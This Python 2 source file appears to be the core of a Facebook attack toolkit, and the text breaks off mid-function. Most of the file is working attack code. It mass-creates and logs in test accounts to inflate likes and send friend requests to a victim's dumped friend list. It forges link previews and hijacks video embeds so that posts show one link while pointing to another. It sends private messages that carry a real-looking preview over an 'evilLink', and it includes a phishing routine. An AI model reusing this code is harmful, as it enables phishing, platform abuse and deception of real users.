import sys,os
from platform import system
from getpass import getpass
from mainLib import *
import MyParser
from urllib import urlencode
import simplejson as json
import database
from time import time,ctime,sleep
import pickle
import re
from handlers import *
import signal
import networkx as nx
import matplotlib.pyplot as plt
import numpy as np
import community
from networkx.drawing.nx_agraph import write_dot
from base64 import b64encode
import logging
from mechanize import Request
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import datetime
from random import shuffle
blocked = 0
masterCj = ''
def flush():
if system() == 'Linux':
sys.stdout.flush()
def setGlobalLogginng():
global globalLogging
globalLogging = not globalLogging
message = 'logging level set to %s' %globalLogging
logs(message)
raw_input(message + ' Press enter to continue')
def setMail():
email = raw_input("Enter the email: ")
password = getpass("Enter the Password: ")
return email, password
def login(email, password,state):
global blocked
cookieHandler = customCookies()
cj.clear()
profile = webdriver.FirefoxProfile()
profile.set_preference("general.useragent.override", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.76 Safari/537.36")
driver = webdriver.Firefox(profile)
driver.get("https://www.facebook.com/")
assert "Facebook" in driver.title
elem = driver.find_element_by_name("email")
elem.send_keys(email)
elem = driver.find_element_by_name("pass")
elem.send_keys(password)
elem.send_keys(Keys.RETURN)
all_cookies = driver.get_cookies()
pickle.dump( driver.get_cookies() , open("cookies.pkl","wb"))
assert "No results found." not in driver.page_source
driver.close()
for s_cookie in all_cookies:
cj.set_cookie(cookielib.Cookie(version = 0, name = s_cookie['name'], value = s_cookie['value'], port = '80', port_specified = False, domain = s_cookie['domain'], domain_specified = True, domain_initial_dot = False, path = s_cookie['path'], path_specified = True, secure = s_cookie['secure'], expires = s_cookie['expiry'], discard = False, comment = None, comment_url = None, rest = None, rfc2109 = False))
try:
if cookieHandler.isLogged(cj) == True:
if cookieHandler.checkPoint(cj) == True:
blocked = 1
print 'Error - Checkpoint reached, your account may be blocked'
return -1
if state != 'real':
cookieArray.append(cj._cookies)
else:
logs('Logging failed')
print '\rLogging failed, check credentials and try again\r'
return -1
except signalCaught as e:
deleteUser(10)
message = '%s catch from login' %e.args[0]
logs(str(message))
print '%s \n' %message
raw_input('Press enter to continue')
return
def set_dtsg():
n = 0
flag = False
try:
response = br.open('https://www.facebook.com/')
''' Old dtsg set module..
for form in br.forms():
for control in form.controls:
if control.name == 'fb_dtsg':
flag = True
break
n += 1
if flag: break
br.select_form(nr=n-1) '''
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
logs('Error in the dtsg set module')
print '\rTrying to set dtsg \r'
return workarounddtsg()
def workarounddtsg():
try:
response = br.open('https://www.facebook.com/')
parse = response.read()
match = re.search("\"fb_dtsg\"", parse)
matchBis = re.search("value=\"",parse[match.end():])
matchBisBis = re.search("\"",parse[match.end()+matchBis.end():])
fb_dtsg = parse[match.end()+matchBis.end():match.end()+matchBis.end()+matchBisBis.start()]
return fb_dtsg
except:
print 'error'
return 0
def getC_user():
for cookie in cj:
if (cookie.name == 'c_user'):
c_user = cookie.value
return str(c_user)
def createUser(number):
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
c_user = getC_user()
arguments = {
'__user' : c_user,
'__a' : '1',
'__dyn' : '798aD5z5zufEa0',
'__req' : '4',
'fb_dtsg' : fb_dtsg,
'phstamp' : '16581655751108754574',
}
datos = urlencode(arguments)
userRaw = []
percentage = 0.0
print 'Creating Test Users .. '
for i in range(int(number)):
try:
response = br.open('https://www.facebook.com/ajax/whitehat/create_test_user.php',datos)
userRaw.append(str(response.read()))
percentage = (i * 100.0) / int(number)
flush()
print '\rCompleted [%.2f%%]\r'%percentage,
sleep(60)
except mechanize.HTTPError as e:
logs(str(e.code) + ' on iteration ' + str(i))
print str(e.code) + ' on iteration %d'%i
except mechanize.URLError as e:
logs(str(e.reason.args) + ' on iteration ' + str(i))
print str(e.reason.args) + ' on iteration %d'%i
except signalCaught as e:
raise signalCaught(str(e.args[0])+' handling from createUser.. ')
except:
logs('Error in create module on iteration ' + str(i))
print '\r \r',
print '\rError in create module on iteration %d\r' %i,
fullFlag = MyParser.parseData(userRaw)
return fullFlag
'''
def deleteUser():
#Number is the max amount of test user accounts - Modify this value if the platform change
number = 10
itemNum = 0
users = []
ids = []
try:
request = br.open("https://www.facebook.com/whitehat/accounts/")
except mechanize.HTTPError as e:
logs(str(e.code) + ' on deleteUser module')
print str(e.code) + ' on deleteUser module'
except mechanize.URLError as e:
logs(str(e.reason.args) + ' on deleteUser module')
print str(e.reason.args) + ' on deleteUser module'
i = 0
for form in br.forms():
try:
form.find_control('selected_test_users[]').items
br.select_form(nr=i)
break
except:
i += 1
continue
try:
for item in br.form.find_control('selected_test_users[]').items:
users.append(item.name)
br.form.find_control('selected_test_users[]').items[itemNum].selected = True
itemNum += 1
string = list(br.forms())[1]['fb_dtsg']
i = 0
dictioUser = {'fb_dtsg':str(string)}
for parameters in users:
if (i <= number):
dictioUser['selected_test_users['+str(i)+']'] = parameters
i += 1
for elements in dictioUser:
ids.append(str(dictioUser[str(elements)]))
dictioUser['__user'] = str(getC_user())
dictioUser['__a'] = '1'
dictioUser['__dyn'] = '7n8ahyj35zolgDxqihXzA'
dictioUser['__req'] = 'a'
dictioUser['phstamp'] = '1658168991161218151159'
datos = urlencode(dictioUser)
response = br.open('https://www.facebook.com/ajax/whitehat/delete_test_users.php',datos)
if globalLogging:
logs(request.read())
logs(response.read())
except:
logs('No users for eliminate')
print '\rNo users for eliminate\r'
'''
def deleteUser(appId):
''' Selects the fb_dtsg form '''
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'__user' : str(getC_user()),
'__a' : '1',
'__dyn' : '7w86i3S2e4oK4pomXWo5O12wYw',
'__req' : '4',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '26581718683108776783808786',
'__rev' : '1409158'
}
testUserID = database.getUsers()
for n in len(testUserID[0]):
arguments['test_user_ids['+str(n)+']'] = str(testUserID[0][n])
datos = urlencode(arguments)
try:
response = br.open('https://developers.facebook.com/apps/async/test-users/delete/?app_id='+appId,datos)
if globalLogging:
logs(response.read())
except:
logs('Error deleting users')
print 'Error deleting users \n'
def massLogin():
i = int(0)
people = database.getUsersNotLogged()
print '\r \r',
loadPersistentCookie()
for person in people:
rsp = login(str(person[0]),str(person[3]),'test')
i+=1
percentage = (i * 100.0) / len(people)
flush()
print '\rCompleted [%.2f%%]\r'%percentage,
if rsp == -1:
database.removeTestUsers(person[0])
savePersistentCookie()
def friendshipRequest():
if (len(cookieArray) == 1):
massLogin()
userID = database.getUsers()
for cookies in range(len(cookieArray)):
cj._cookies = cookieArray[cookies]
c_user = getC_user()
users = 0
for person in userID:
'''---------------------Comienza el envio de solicitudes ... ----------------------- '''
if users > cookies:
sendRequest(person[0],c_user)
users += 1
def sendRequest(userID,c_user):
''' Selects the fb_dtsg form '''
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'to_friend' : userID,
'action' : 'add_friend',
'how_found' : 'profile_button',
'ref_param' : 'none',
'link_data[gt][profile_owner]' : userID,
'link_data[gt][ref]' : 'timeline:timeline',
'outgoing_id' : '',
'logging_location' : '',
'no_flyout_on_click' : 'true',
'ego_log_data' : '',
'http_referer' : '',
'__user' : c_user,
'__a' : '1',
'__dyn' : '7n8aD5z5zu',
'__req' : 'n',
'fb_dtsg' : fb_dtsg,
'phstamp' : '1658165688376111103320'
}
datos = urlencode(arguments)
try:
response = br.open('https://www.facebook.com/ajax/add_friend/action.php',datos)
if globalLogging:
logs(response.read())
print 'Friend Request sent from %s to %s! \n' %(c_user,userID)
except:
logs('Error sending request ')
print 'Error sending request \n'
def sendRequestToList(victim):
root = 'dumps'
directory = victim
friends = []
frieds_send = []
count = 0
number = raw_input('Insert the amount of requests to send: ')
try:
try:
persons = open( os.path.join(root,directory,victim+".txt"),"rb" )
except:
logs('Friend file not found')
print 'Friend file not found'
return
try:
persons_send = open( os.path.join(root,directory,victim+"_friend_send.txt"),"rb")
while True:
linea = persons_send.readline()
if not linea:
break
frieds_send.append(linea.strip("\n\r"))
persons_send.close()
persons_send = open(os.path.join(root,directory,victim+"_friend_send.txt"),"ab")
except:
persons_send = open(os.path.join(root,directory,victim+"_friend_send.txt"),"wb")
while True:
linea = persons.readline()
if not linea:
break
friends.append(linea.strip("\n\r"))
i = 0.0
percentage = 0.0
print 'Sending friend requests'
for userID in friends:
if userID not in frieds_send:
if count > int(number):
persons_send.close()
return
count += 1
''' Selects the fb_dtsg form '''
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
c_user = getC_user()
arguments = {
'to_friend' : userID,
'action' : 'add_friend',
'how_found' : 'profile_button',
'ref_param' : 'none',
'link_data[gt][profile_owner]' : userID,
'link_data[gt][ref]' : 'timeline:timeline',
'outgoing_id' : '',
'logging_location' : '',
'no_flyout_on_click' : 'true',
'ego_log_data' : '',
'http_referer' : '',
'__user' : c_user,
'__a' : '1',
'__dyn' : '7n8aD5z5zu',
'__req' : 'n',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '265817211599516953787450107',
}
datos = urlencode(arguments)
try:
response = br.open('https://www.facebook.com/ajax/add_friend/action.php',datos)
percentage = (i * 100.0) / len(friends)
i+=1
flush()
print '\rCompleted [%.2f%%]\r'%percentage,
if globalLogging:
logs(response.read())
print 'Friend Request sent from %s to %s! \n' %(c_user,userID)
persons_send.write(userID+'\n')
except:
logs('Error sending request ')
print 'Error sending request \n'
except signalCaught as e:
message = '%s catch from send request module' %e.args[0]
logs(str(message))
print '%s \n' %message
persons_send.close()
raw_input('Press enter to continue')
return
def acceptRequest():
initAccept()
acceptIDS = MyParser.parsePending()
while len(acceptIDS) != 0:
for elements in acceptIDS:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'action' : 'confirm',
'id' : elements,
'ref' : '%2Freqs.php',
'__user' : getC_user(),
'__a' : '1',
'__dyn' : '7n8aD5z5zu',
'__req' : 'm',
'fb_dtsg' : fb_dtsg,
'phstamp' : '165816867997811675120'
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/requests/friends/ajax/ ',datos)
if globalLogging:
logs(response.read())
print 'Accept done! \n'
initAccept()
acceptIDS = MyParser.parsePending()
def initAccept():
f = open("respuesta.html","wb")
response = br.open('https://www.facebook.com/friends/requests/')
''' Se guarda el output de la respuesta html para ser parseada y filtrar los ID's '''
f.write(response.read())
f.close()
def savePersistentCookie():
f = open("cookiesObject","wb")
pickle.dump(cookieArray,f)
f.close()
for element in cookieArray:
cj._cookies = element
for cookie in cj:
if (cookie.name == 'c_user'):
c_user = cookie.value
database.setLogged(c_user)
def loadPersistentCookie():
global cookieArray
try:
f = open("cookiesObject","r")
cookieArray = pickle.load(f)
i = 0
''' Se limpian las cookies que no sirven - se filtra el id para cambiar su estado a logged = 0 '''
for cookie in cookieArray:
cj._cookies = cookie
for element in cj:
if (element.name == 'checkpoint'):
strip = str(element.value).strip("%7B%22u%22%3A")
removeId = strip.split("%2C%22t%22%3A")[0]
database.setLoggedOut(removeId)
del cookieArray[i]
i+=1
except:
return
def deleteAccounts():
people = database.getUsers()
for person in people:
database.removeTestUsers(person[0])
cookieArray[:] = []
def like(postId, quantity):
signal.signal(signal.SIGINT, signal_handler)
try:
email,password = setMail()
if (login(email,password,'real') is not -1):
masterCookie = cj._cookies
times = int(quantity) / 10
for i in range(times):
cj._cookies = masterCookie
if ( createUser(10) == -1 ):
deleteUser()
deleteAccounts()
createUser(10)
massLogin()
percentage = 0.0
j = 0.0
total = len(cookieArray) * len(postId)
print '\r \r',
for i in range(len(cookieArray)):
for post in range(len(postId)):
cj._cookies = cookieArray[i]
c_user = getC_user()
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'like_action' : 'true',
'ft_ent_identifier' : str(postId[post]),
'source' : '0',
'client_id' : str(c_user)+'%3A4047576437',
'rootid' : 'u_0_2o',
'giftoccasion' : '',
'ft[tn]' : '%3E%3D',
'ft[type]' : '20',
'nctr[_mod]' : 'pagelet_timeline_recent',
'__user' : c_user,
'__a' : '1',
'__dyn' : '7n8ahyj35ym3KiA',
'__req' : 'c',
'fb_dtsg' : fb_dtsg,
'phstamp' : '165816595797611370260',
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/ufi/like.php',datos)
if globalLogging:
logs(response.read())
percentage = (j * 100.0)/total
flush()
print '\r[%.2f%%] of likes completed\r' %(percentage),
j+=1
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
print 'Unknown error'
cj._cookies = masterCookie
deleteUser()
deleteAccounts()
raw_input('Finished like() module, press enter to continue')
except signalCaught as e:
deleteUser()
message = '%s catch from create module' %e.args[0]
logs(str(message))
print '%s \n' %message
raw_input('Press enter to continue')
return
def appMessageSpoof(appId,link,picture,title,domain,description,comment):
c_user = getC_user()
print str(c_user)+'\n'
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'fb_dtsg' : fb_dtsg,
'preview' : '0',
'_path' : 'feed',
'app_id' : int(appId),
'redirect_uri' : 'https://facebook.com/',
'display' : 'page',
'link' : str(link),
'picture' : str(picture),
'name' : str(title),
'caption' : str(domain),
'description' : str(description),
'from_post' : '1',
'feedform_user_message' : str(comment),
'publish' : 'Share',
'audience[0][value]' : '80',
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/v2.0/dialog/feed',datos)
if globalLogging:
logs(response.read())
except:
logs('Error en el modulo de appMessageSpoof()')
print 'Error en el modulo de appMessageSpoof()\n'
def linkPreviewYoutube(link,videoLink,title,summary,comment,videoID, privacy):
c_user = getC_user()
print str(c_user)+'\n'
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'fb_dtsg' : fb_dtsg,
'composer_session_id' : '38c20e73-acfc-411a-8313-47c095b01e42',
'xhpc_context' : 'profile',
'xhpc_ismeta' : '1',
'xhpc_timeline' : '1',
'xhpc_composerid' : 'u_0_29',
'xhpc_targetid' : str(c_user),
'clp' : '{ cl_impid : 65ac6257 , clearcounter :0, elementid : u_0_2n , version : x , parent_fbid :'+str(c_user)+'}',
'xhpc_message_text' : str(comment),
'xhpc_message' : str(comment),
'aktion' : 'post',
'app_id' : '2309869772',
'attachment[params][urlInfo][canonical]' : str(videoLink),
'attachment[params][urlInfo][final]' : str(videoLink),
'attachment[params][urlInfo][user]' : str(link),
'attachment[params][favicon]' : 'http://s.ytimg.com/yts/img/favicon_32-vflWoMFGx.png',
'attachment[params][title]' : str(title),
'attachment[params][summary]' : str(summary),
'attachment[params][images][0]' : 'http://i2.ytimg.com/vi/'+videoID+'/mqdefault.jpg?feature=og',
'attachment[params][medium]' : '103',
'attachment[params][url]' : str(videoLink),
'attachment[params][video][0][type]' : 'application/x-shockwave-flash',
'attachment[params][video][0][src]' : 'http://www.youtube.com/v/FxyecjOQXnI?autohide=1&version=3&autoplay=1',
'attachment[params][video][0][width]' : '1280',
'attachment[params][video][0][height]' : '720',
'attachment[params][video][0][safe]' : '1',
'attachment[type]' : '100',
'link_metrics[source]' : 'ShareStageExternal',
'link_metrics[domain]' : 'www.youtube.com',
'link_metrics[base_domain]' : 'youtube.com',
'link_metrics[title_len]' : '92',
'link_metrics[summary_len]' : '160',
'link_metrics[min_dimensions][0]' : '70',
'link_metrics[min_dimensions][1]' : '70',
'link_metrics[images_with_dimensions]' : '1',
'link_metrics[images_pending]' : '0',
'link_metrics[images_fetched]' : '0',
'link_metrics[image_dimensions][0]' : '1280',
'link_metrics[image_dimensions][1]' : '720',
'link_metrics[images_selected]' : '1',
'link_metrics[images_considered]' : '1',
'link_metrics[images_cap]' : '10',
'link_metrics[images_type]' : 'images_array',
'composer_metrics[best_image_w]' : '398',
'composer_metrics[best_image_h]' : '208',
'composer_metrics[image_selected]' : '0',
'composer_metrics[images_provided]' : '1',
'composer_metrics[images_loaded]' : '1',
'composer_metrics[images_shown]' : '1',
'composer_metrics[load_duration]' : '1058',
'composer_metrics[timed_out]' : '0',
'composer_metrics[sort_order]' : '',
'composer_metrics[selector_type]' : 'UIThumbPager_6',
'backdated_date[year]' : '',
'backdated_date[month]' : '',
'backdated_date[day]' : '',
'backdated_date[hour]' : '',
'backdated_date[minute]' : '',
'is_explicit_place' : '',
'composertags_place' : '',
'composertags_place_name' : '',
'tagger_session_id' : '1394761251',
'action_type_id[0]' : '',
'object_str[0]' : '',
'object_id[0]' : '',
'og_location_id[0]' : '',
'hide_object_attachment' : '0',
'og_suggestion_mechanism' : '',
'composertags_city' : '',
'disable_location_sharing' : 'false',
'composer_predicted_city' : '',
'audience[0][value]' : privacy,
'nctr[_mod]' : 'pagelet_timeline_recent',
'__user' : str(c_user),
'__a' : '1',
'__dyn' : '7n8aqEAMBlCFUSt2u6aOGeExEW9ACxO4pbGA8AGGzCAjFDxCm',
'__req' : 'm',
'ttstamp' : '26581658074898653',
'__rev' : '1161243',
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/updatestatus.php',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
logs('Error en el modulo de linkPreviewYoutube()')
print 'Error en el modulo de linkPreviewYoutube()\n'
def linkPreview(link,realLink,title,summary,comment,image,privacy):
c_user = getC_user()
print str(c_user)+'\n'
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'composer_session_id' : '787d2fec-b5c1-41fe-bbda-3450a03240c6',
'fb_dtsg' : fb_dtsg,
'xhpc_context' : 'profile',
'xhpc_ismeta' : '1',
'xhpc_timeline' : '1',
'xhpc_composerid' : 'u_0_29',
'xhpc_targetid' : str(c_user),
'clp' : '{"cl_impid":"27c5e963","clearcounter":0,"elementid":"u_0_2n","version":"x","parent_fbid":'+str(c_user)+'}',
'xhpc_message_text' : str(comment),
'xhpc_message' : str(comment),
'aktion' : 'post',
'app_id' : '2309869772',
'attachment[params][urlInfo][canonical]' : str(realLink),
'attachment[params][urlInfo][final]' : str(realLink),
'attachment[params][urlInfo][user]' : str(link),
'attachment[params][favicon]' : str(realLink)+'/images/favicon.ico',
'attachment[params][title]' : str(title),
'attachment[params][summary]' : str(summary),
'attachment[params][images][0]' : str(image),
'attachment[params][medium]' : '106',
'attachment[params][url]' : str(realLink),
'attachment[type]' : '100',
'link_metrics[source]' : 'ShareStageExternal',
'link_metrics[domain]' : str(realLink),
'link_metrics[base_domain]' : str(realLink),
'link_metrics[title_len]' : '38',
'link_metrics[summary_len]' : '38',
'link_metrics[min_dimensions][0]' : '70',
'link_metrics[min_dimensions][1]' : '70',
'link_metrics[images_with_dimensions]' : '3',
'link_metrics[images_pending]' : '0',
'link_metrics[images_fetched]' : '0',
'link_metrics[image_dimensions][0]' : '322',
'link_metrics[image_dimensions][1]' : '70',
'link_metrics[images_selected]' : '1',
'link_metrics[images_considered]' : '5',
'link_metrics[images_cap]' : '3',
'link_metrics[images_type]' : 'ranked',
'composer_metrics[best_image_w]' : '100',
'composer_metrics[best_image_h]' : '100',
'composer_metrics[image_selected]' : '0',
'composer_metrics[images_provided]' : '1',
'composer_metrics[images_loaded]' : '1',
'composer_metrics[images_shown]' : '1',
'composer_metrics[load_duration]' : '812',
'composer_metrics[timed_out]' : '0',
'composer_metrics[sort_order]' : '',
'composer_metrics[selector_type]' : 'UIThumbPager_6',
'backdated_date[year]' : '',
'backdated_date[month]' : '',
'backdated_date[day]' : '',
'backdated_date[hour]' : '',
'backdated_date[minute]' : '',
'is_explicit_place' : '',
'composertags_place' : '',
'composertags_place_name' : '',
'tagger_session_id' : '1394765332',
'action_type_id[0]' : '',
'object_str[0]' : '',
'object_id[0]' : '',
'og_location_id[0]' : '',
'hide_object_attachment' : '0',
'og_suggestion_mechanism' : '',
'composertags_city' : '',
'disable_location_sharing' : 'false',
'composer_predicted_city' : '',
'audience[0][value]' : privacy,
'nctr[_mod]' : 'pagelet_timeline_recent',
'__user' : str(c_user),
'__a' : '1',
'__dyn' : '7n8aqEAMBlCFUSt2u6aOGeExEW9ACxO4pbGA8AGGzCAjFDxCm',
'__req' : 'h',
'ttstamp' : '26581658074898653',
'__rev' : '1161243'
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/updatestatus.php',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
logs('Error en el modulo de linkPreview()')
print 'Error en el modulo de linkPreview()\n'
def hijackVideo(videoLink,title,summary,comment,videoID,hijackedVideo,privacy):
c_user = getC_user()
print str(c_user)+'\n'
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'composer_session_id' : '8c4e1fa6-5f1f-4c16-b393-5c1ab4c3802b',
'fb_dtsg' : fb_dtsg,
'xhpc_context' : 'profile',
'xhpc_ismeta' : '1',
'xhpc_timeline' : '1',
'xhpc_composerid' : 'u_0_23',
'xhpc_targetid' : str(c_user),
'clp' : '{"cl_impid":"4b4a8369","clearcounter":0,"elementid":"u_0_2h","version":"x","parent_fbid":'+str(c_user)+'}',
'xhpc_message_text' : str(comment),
'xhpc_message' : str(comment),
'aktion' : 'post',
'app_id' : '2309869772',
'attachment[params][urlInfo][canonical]' : str(videoLink),
'attachment[params][urlInfo][final]' : str(videoLink),
'attachment[params][urlInfo][user]' : str(videoLink),
'attachment[params][favicon]' : 'http://s.ytimg.com/yts/img/favicon_32-vflWoMFGx.png',
'attachment[params][title]' : str(title),
'attachment[params][summary]' : str(summary),
'attachment[params][images][0]' : 'http://i2.ytimg.com/vi/'+videoID+'/mqdefault.jpg?feature=og',
'attachment[params][medium]' : '103',
'attachment[params][url]' : str(videoLink),
'attachment[params][video][0][type]' : 'application/x-shockwave-flash',
'attachment[params][video][0][src]' : 'http://www.youtube.com/v/'+str(hijackedVideo)+'?version=3&autohide=1&autoplay=1',
'attachment[params][video][0][width]' : '1920',
'attachment[params][video][0][height]' : '1080',
'attachment[params][video][0][safe]' : '1',
'attachment[type]' : '100',
'link_metrics[source]' : 'ShareStageExternal',
'link_metrics[domain]' : 'www.youtube.com',
'link_metrics[base_domain]' : 'youtube.com',
'link_metrics[title_len]' : str(len(title)),
'link_metrics[summary_len]' : str(len(summary)),
'link_metrics[min_dimensions][0]' : '62',
'link_metrics[min_dimensions][1]' : '62',
'link_metrics[images_with_dimensions]' : '1',
'link_metrics[images_pending]' : '0',
'link_metrics[images_fetched]' : '0',
'link_metrics[image_dimensions][0]' : '1920',
'link_metrics[image_dimensions][1]' : '1080',
'link_metrics[images_selected]' : '1',
'link_metrics[images_considered]' : '1',
'link_metrics[images_cap]' : '10',
'link_metrics[images_type]' : 'images_array',
'composer_metrics[best_image_w]' : '154',
'composer_metrics[best_image_h]' : '154',
'composer_metrics[image_selected]' : '0',
'composer_metrics[images_provided]' : '1',
'composer_metrics[images_loaded]' : '1',
'composer_metrics[images_shown]' : '1',
'composer_metrics[load_duration]' : '1184',
'composer_metrics[timed_out]' : '0',
'composer_metrics[sort_order]' : '',
'composer_metrics[selector_type]' : 'UIThumbPager_6',
'backdated_date[year]' : '',
'backdated_date[month]' : '',
'backdated_date[day]' : '',
'backdated_date[hour]' : '',
'backdated_date[minute]' : '',
'is_explicit_place' : '',
'composertags_place' : '',
'composertags_place_name' : '',
'tagger_session_id' : '1399663185',
'action_type_id[0]' : '',
'object_str[0]' : '',
'object_id[0]' : '',
'og_location_id[0]' : '',
'hide_object_attachment' : '0',
'og_suggestion_mechanism' : '',
'composertags_city' : '',
'disable_location_sharing' : 'false',
'composer_predicted_city' : '',
'audience[0][value]' : str(privacy),
'nctr[_mod]' : 'pagelet_timeline_recent',
'__user' : str(c_user),
'__a' : '1',
'__dyn' : '7n8ajEAMBlynzpQ9UoGya4Cq7pEsx6iWF29aGEZ94WpUpBxCFaG',
'__req' : 'g',
'ttstamp' : '265817289113541097355755354',
'__rev' : '1241763',
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/updatestatus.php',datos)
if globalLogging:
logs(response.read())
except:
logs('Error en el modulo de linkPreviewYoutube()')
print 'Error en el modulo de linkPreviewYoutube()\n'
def getTime():
hour = datetime.datetime.strftime(datetime.datetime.now(), '%H:%M')
if int(hour.split(':')[0]) >= 12:
hour += 'am'
else:
hour += 'pm'
return hour
def privateMessageLink(message,victim,subject,realLink,title,summary,imageLink,evilLink):
c_user = getC_user()
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'message_batch[0][action_type]' : 'ma-type:user-generated-message',
'message_batch[0][thread_id]' : '',
'message_batch[0][author]' : 'fbid:'+c_user,
'message_batch[0][author_email]' : '',
'message_batch[0][timestamp]' : str(int(time())),
'message_batch[0][timestamp_absolute]' : 'Today',
'message_batch[0][timestamp_relative]' : getTime(),
'message_batch[0][timestamp_time_passed]' : '0',
'message_batch[0][is_unread]' : 'false',
'message_batch[0][is_cleared]' : 'false',
'message_batch[0][is_forward]' : 'false',
'message_batch[0][is_filtered_content]' : 'false',
'message_batch[0][is_spoof_warning]' : 'false',
'message_batch[0][source]' : 'source:titan:web',
'message_batch[0][body]' : message,
'message_batch[0][has_attachment]' : 'true',
'message_batch[0][html_body]' : 'false',
'message_batch[0][specific_to_list][0]' : 'fbid:' + victim,
'message_batch[0][content_attachment][subject]' : subject,
'message_batch[0][content_attachment][app_id]' : '2309869772',
'message_batch[0][content_attachment][attachment][params][urlInfo][canonical]' : realLink,
'message_batch[0][content_attachment][attachment][params][urlInfo][final]' : realLink,
'message_batch[0][content_attachment][attachment][params][urlInfo][user]' : evilLink,
'message_batch[0][content_attachment][attachment][params][favicon]' : realLink+'/favicon.ico',
'message_batch[0][content_attachment][attachment][params][title]' : title,
'message_batch[0][content_attachment][attachment][params][summary]' : summary,
'message_batch[0][content_attachment][attachment][params][images][0]' : imageLink,
'message_batch[0][content_attachment][attachment][params][medium]' : '106',
'message_batch[0][content_attachment][attachment][params][url]' : realLink,
'message_batch[0][content_attachment][attachment][type]' : '100',
'message_batch[0][content_attachment][link_metrics][source]' : 'ShareStageExternal',
'message_batch[0][content_attachment][link_metrics][domain]' : realLink.strip('https://').strip('/'),
'message_batch[0][content_attachment][link_metrics][base_domain]' : realLink.strip('https://www.').strip('/'),
'message_batch[0][content_attachment][link_metrics][title_len]' : '38',
'message_batch[0][content_attachment][link_metrics][summary_len]' : '38',
'message_batch[0][content_attachment][link_metrics][min_dimensions][0]' : '70',
'message_batch[0][content_attachment][link_metrics][min_dimensions][1]' : '70',
'message_batch[0][content_attachment][link_metrics][images_with_dimensions]' : '3',
'message_batch[0][content_attachment][link_metrics][images_pending]' : '0',
'message_batch[0][content_attachment][link_metrics][images_fetched]' : '0',
'message_batch[0][content_attachment][link_metrics][image_dimensions][0]' : '322',
'message_batch[0][content_attachment][link_metrics][image_dimensions][1]' : '70',
'message_batch[0][content_attachment][link_metrics][images_selected]' : '1',
'message_batch[0][content_attachment][link_metrics][images_considered]' : '5',
'message_batch[0][content_attachment][link_metrics][images_cap]' : '3',
'message_batch[0][content_attachment][link_metrics][images_type]' : 'ranked',
'message_batch[0][content_attachment][composer_metrics][best_image_w]' : '100',
'message_batch[0][content_attachment][composer_metrics][best_image_h]' : '100',
'message_batch[0][content_attachment][composer_metrics][image_selected]' : '0',
'message_batch[0][content_attachment][composer_metrics][images_provided]' : '1',
'message_batch[0][content_attachment][composer_metrics][images_loaded]' : '1',
'message_batch[0][content_attachment][composer_metrics][images_shown]' : '1',
'message_batch[0][content_attachment][composer_metrics][load_duration]' : '6',
'message_batch[0][content_attachment][composer_metrics][timed_out]' : '0',
'message_batch[0][content_attachment][composer_metrics][sort_order]' : '',
'message_batch[0][content_attachment][composer_metrics][selector_type]' : 'UIThumbPager_6',
'message_batch[0][force_sms]' : 'true',
'message_batch[0][ui_push_phase]' : 'V3',
'message_batch[0][status]' : '0',
'message_batch[0][message_id]' : '<1394766424499:[email protected]>',
'message_batch[0][client_thread_id]' : 'user:'+str(c_user),
'client' : 'web_messenger',
'__user' : c_user,
'__a' : '1',
'__dyn' : '7n8a9EAMBlCFYwyt2u6aOGeExEW9J6yUgByVbGAF4iGGeqheCu6po',
'__req' : '1n',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '26581658074898653',
'__rev' : '1161243'
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/mercury/send_messages.php',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
print 'Ctrl+c SIGNAL Caught\n'
return
def privateMessagePhishing(victimId,message,subject,evilLink,videoLink,title,summary,videoID,hijackedVideo):
c_user = getC_user()
print str(c_user)+'\n'
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'message_batch[0][action_type]' : 'ma-type:user-generated-message',
'message_batch[0][thread_id]' : '',
'message_batch[0][author]' : 'fbid:'+str(c_user),
'message_batch[0][author_email]' : '',
'message_batch[0][coordinates]' : '',
'message_batch[0][timestamp]' : '1410457740680',
'message_batch[0][timestamp_absolute]' : 'Today',
'message_batch[0][timestamp_relative]' : '10:16am',
